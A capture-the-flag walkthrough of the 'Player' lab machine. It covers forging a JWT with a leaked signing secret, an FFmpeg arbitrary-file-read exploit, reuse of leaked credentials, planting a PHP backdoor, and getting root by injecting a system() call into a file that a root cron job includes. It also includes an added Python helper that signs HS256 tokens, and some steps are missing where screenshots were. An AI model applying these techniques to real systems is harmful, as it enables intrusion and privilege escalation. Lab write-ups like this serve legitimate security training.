Things to note:

  1. Secret key used to sign the JWT token → _S0_R@nd0m_P@ss_
  2. The access code needed to get the new file location.
  3. Masked endpoint → 7F2xxxxxxxxxxxxx/

If we decode the JWT token captured in the cookie while requesting /launcher/dee8dc8a47256c64630d803a4c40786e.php, we get:

Copy the cookie and paste it into the decoder:

access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ

and we get the decoded header and payload.

We just need to change the access_code claim to the value found in the backup file and sign the token using _S0_R@nd0m_P@ss_.
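As an added example (my code, not from this writeup), here is the JWT handling described above in Python: reading the claims out of the captured access cookie, and the verification a server has to perform, which is what makes the HS256 secret recovered from the backup file enough to produce tokens the server accepts.

```python
import base64
import hashlib
import hmac
import json

# Cookie value as captured on the page (header.payload; the signature segment was cut off).
CAPTURED_COOKIE = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
                   "eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6"
                   "IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ")

def b64url_decode(segment: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def decode_claims(token: str) -> dict:
    """Read header and payload without checking the signature. Anyone holding
    the cookie can do this, so nothing in the claims is confidential."""
    header, payload = token.split(".")[:2]
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}

def sign_hs256(claims: dict, secret: str) -> str:
    """Issue an HS256 token the way the server does. The MAC is the only thing
    binding the claims, so whoever learns the secret can issue accepted tokens."""
    header = b64url_encode(b'{"typ":"JWT","alg":"HS256"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256)
    return f"{header}.{payload}.{b64url_encode(mac.digest())}"

def verify_hs256(token: str, secret: str):
    """Server-side check: exactly three segments, alg pinned to HS256, MAC
    recomputed and compared in constant time. Payload dict on success, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, payload, sig = parts
    try:
        if json.loads(b64url_decode(header)).get("alg") != "HS256":
            return None
        mac = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256)
        if not hmac.compare_digest(mac.digest(), b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(payload))
    except ValueError:  # bad base64 or JSON (both raise ValueError subclasses)
        return None
```

The captured cookie has no signature segment, so verify_hs256 rejects it outright; only the claims can be read from it.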

When we upload any file, we see that:

It gets uploaded successfully with a message that compression completed, followed by a link to our uploads. Clicking on the Buffed Media link,

we get a download prompt for it. The file extension is .avi, which is a video format, even though we uploaded a jpg; a video file is accepted just the same. Searching Google for video upload exploits, we get:

Checking possible exploits for the same, we see that there is a known vulnerability in FFmpeg. Using the script from this repo, we will create custom payloads to read arbitrary files from the server.

When we run this file:

We get "forbidden command" errors for every command we try. Since we know this port was running OpenSSH 7.2, I went looking for any interesting CVEs for it and found:

Copy the content and save it in

These credentials (peter : CQXpm\z)G5D#%S$y=) worked with dev.player.htb:

And we are in.

Now we try to create a new project in /var/www/html:

But we get an error when creating a new project here.

I wanted to see if that was related to /var/www/demo/home, so I created a file called new.php that echoed "new" and tried to access it through /home:

Now, on the portal, we create a PHP backdoor.

When I ran pspy to monitor the processes, I noticed that /var/lib/playbuff/buff.php was executed as root periodically:

2020/01/18 05:25:02 CMD: UID=0    PID=3650   | /usr/bin/php /var/lib/playbuff/buff.php

I couldn't write to it, but it included another PHP file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):

Add this line to that included file so it gets executed by the root cron job:

system("bash -c /tmp/");

root@kali:~# mv rev.php dee8dc8a47256c64630d803a4c40786g.php